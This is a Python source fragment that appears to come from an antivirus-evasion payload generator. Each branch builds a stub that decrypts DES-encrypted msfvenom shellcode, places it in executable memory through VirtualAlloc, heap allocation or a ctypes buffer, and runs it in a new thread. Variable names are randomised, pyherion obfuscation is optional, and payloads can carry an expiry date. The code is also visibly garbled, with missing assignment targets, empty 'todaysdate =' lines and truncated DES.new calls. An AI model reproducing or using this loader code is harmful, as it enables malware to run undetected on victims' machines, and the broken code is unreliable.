                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                PayloadCode += RandIV + " = '" + iv + "'\n"
                PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += RandDESPayload + " =" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                PayloadCode += (
                    + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
                PayloadCode += (
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                PayloadCode += (
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                PayloadCode += (
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " =\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
                PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += "\t" + RandDESPayload + " =" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    + ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                PayloadCode += (
                    + RandPtr
                    + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n"
                PayloadCode += (
                    + RandBuf
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                PayloadCode += (
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                PayloadCode += (
                    + RandHt
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                PayloadCode += (
                    "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["inject_method"][0].lower() == "heap":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                PayloadCode += RandIV + " = '" + iv + "'\n"
                PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += RandDESPayload + " =" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                PayloadCode += (
                    + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ") * 2),avlol.c_int(0))\n"
                PayloadCode += (
                    + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
                    + HeapVar
                    + "),avlol.c_int(0x00000008),avlol.c_int(len( "
                    + ShellcodeVariableName
                    + ")))\n"
                PayloadCode += (
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                PayloadCode += (
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                PayloadCode += (
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "import ctypes as avlol\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " =\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
                PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += "\t" + RandDESPayload + " =" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    + ShellcodeVariableName
                    + " = bytearray("
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape'))\n"
                PayloadCode += (
                    + HeapVar
                    + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len("
                    + ShellcodeVariableName
                    + ") * 2),avlol.c_int(0))\n"
                PayloadCode += (
                    + RandPtr
                    + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int("
                    + HeapVar
                    + "),avlol.c_int(0x00000008),avlol.c_int(len( "
                    + ShellcodeVariableName
                    + ")))\n"
                PayloadCode += (
                    + RandBuf
                    + " = (avlol.c_char * len("
                    + ShellcodeVariableName
                    + ")).from_buffer("
                    + ShellcodeVariableName
                    + ")\n"
                PayloadCode += (
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",avlol.c_int(len("
                    + ShellcodeVariableName
                    + ")))\n"
                PayloadCode += (
                    + RandHt
                    + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int("
                    + RandPtr
                    + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n"
                PayloadCode += (
                    "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "from ctypes import *\n"
                PayloadCode += RandIV + " = '" + iv + "'\n"
                PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += RandDESPayload + " =" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    + " = "
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape')\n"
                PayloadCode += (
                    + " = create_string_buffer("
                    + ShellcodeVariableName
                    + ", len("
                    + ShellcodeVariableName
                    + "))\n"
                PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += RandShellcode + "()"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode


                # Get our current date and add number of days to the date
                todaysdate =
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = "from Crypto.Cipher import DES\n"
                PayloadCode += "from ctypes import *\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " =\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
                PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
                PayloadCode += "\t" + RandDESPayload + " =" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
                PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
                PayloadCode += (
                    + ShellcodeVariableName
                    + " = "
                    + RandDESPayload
                    + ".decrypt("
                    + RandEncShellCodePayload
                    + ").decode('string_escape')\n"
                PayloadCode += (
                    + RandMemoryShell
                    + " = create_string_buffer("
                    + ShellcodeVariableName
                    + ", len("
                    + ShellcodeVariableName
                    + "))\n"
                PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += "\t" + RandShellcode + "()"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode